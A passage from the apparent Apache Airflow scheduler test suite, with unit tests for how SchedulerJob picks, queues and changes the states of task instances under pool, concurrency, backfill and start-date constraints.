scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEquals(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor()
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEquals(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEquals(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0, run_duration=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite haveing an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_process_task_instances(self):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 1)
DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
